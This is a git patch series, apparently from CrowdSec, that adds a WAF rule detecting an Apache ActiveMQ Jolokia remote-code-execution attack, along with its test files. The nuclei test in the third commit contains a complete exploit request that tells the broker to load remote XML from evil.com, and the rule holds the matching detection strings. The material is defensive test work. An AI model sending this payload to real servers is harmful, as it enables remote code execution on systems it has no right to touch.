From cf706e3f08434bcfca45398baeef508e00a7f0a5 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Jul 2026 15:08:14 +0200 Subject: [PATCH 1/4] Add vpatch-CVE-2026-34197 rule --- .../crowdsecurity/vpatch-CVE-2026-34197.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml new file mode 100644 index 00000000000..e495da9907b --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml @@ -0,0 +1,38 @@ +## autogenerated on 2026-07-01 13:08:11 +name: crowdsecurity/vpatch-CVE-2026-34197 +description: 'Detects RCE in Apache ActiveMQ via Jolokia addNetworkConnector with xbean brokerConfig' +rules: + - and: + - zones: + - URI + transform: + - lowercase + match: + type: contains + value: /api/jolokia/ + - zones: + - RAW_BODY + transform: + - lowercase + match: + type: contains + value: 'addnetworkconnector' + - zones: + - RAW_BODY + transform: + - lowercase + match: + type: contains + value: 'brokerconfig=xbean:http' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'Apache ActiveMQ - RCE' + classification: + - cve.CVE-2026-34197 + - attack.T1190 + - cwe.CWE-94 From fd5852daca87dd6dce7f03831fc9e6e82ccb8c51 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Jul 2026 15:08:17 +0200 Subject: [PATCH 2/4] Add vpatch-CVE-2026-34197 test config --- .appsec-tests/vpatch-CVE-2026-34197/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-34197/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-34197/config.yaml b/.appsec-tests/vpatch-CVE-2026-34197/config.yaml new file mode 100644 index 00000000000..78000701c2d --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-34197/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2026-07-01 13:08:11 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml +nuclei_template: CVE-2026-34197.yaml From 1d81d501bd46c46d9da2d3a442b772b8faacce68 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Jul 2026 15:08:19 +0200 Subject: [PATCH 3/4] Add CVE-2026-34197.yaml test --- .../vpatch-CVE-2026-34197/CVE-2026-34197.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-34197/CVE-2026-34197.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-34197/CVE-2026-34197.yaml b/.appsec-tests/vpatch-CVE-2026-34197/CVE-2026-34197.yaml new file mode 100644 index 00000000000..2c1b78d57a1 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-34197/CVE-2026-34197.yaml @@ -0,0 +1,22 @@ +## autogenerated on 2026-07-01 13:08:11 +id: CVE-2026-34197 +info: + name: CVE-2026-34197 + author: crowdsec + severity: info + description: CVE-2026-34197 testing + tags: appsec-testing +http: + - raw: + - | + POST /api/jolokia/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Origin: {{RootURL}} + + [{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"removeNetworkConnector","arguments":["NC"]},{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"addNetworkConnector","arguments":["static:(vm://test?brokerConfig=xbean:http://evil.com/poc.xml)"]}] + cookie-reuse: true + matchers: + - type: status + status: + - 403 From 80decab84970dfa6f580d2d2011e4950636ba857 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Jul 2026 15:08:21 +0200 Subject: [PATCH 4/4] Add vpatch-CVE-2026-34197 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index 79a2e5ca01c..2efee0999d0 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -72,6 +72,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2022-26134 - crowdsecurity/vpatch-CVE-2026-1557 - crowdsecurity/vpatch-CVE-2024-34102 +- crowdsecurity/vpatch-CVE-2026-34197 - crowdsecurity/vpatch-CVE-2024-29973 - crowdsecurity/vpatch-CVE-2022-41082 - crowdsecurity/vpatch-CVE-2019-18935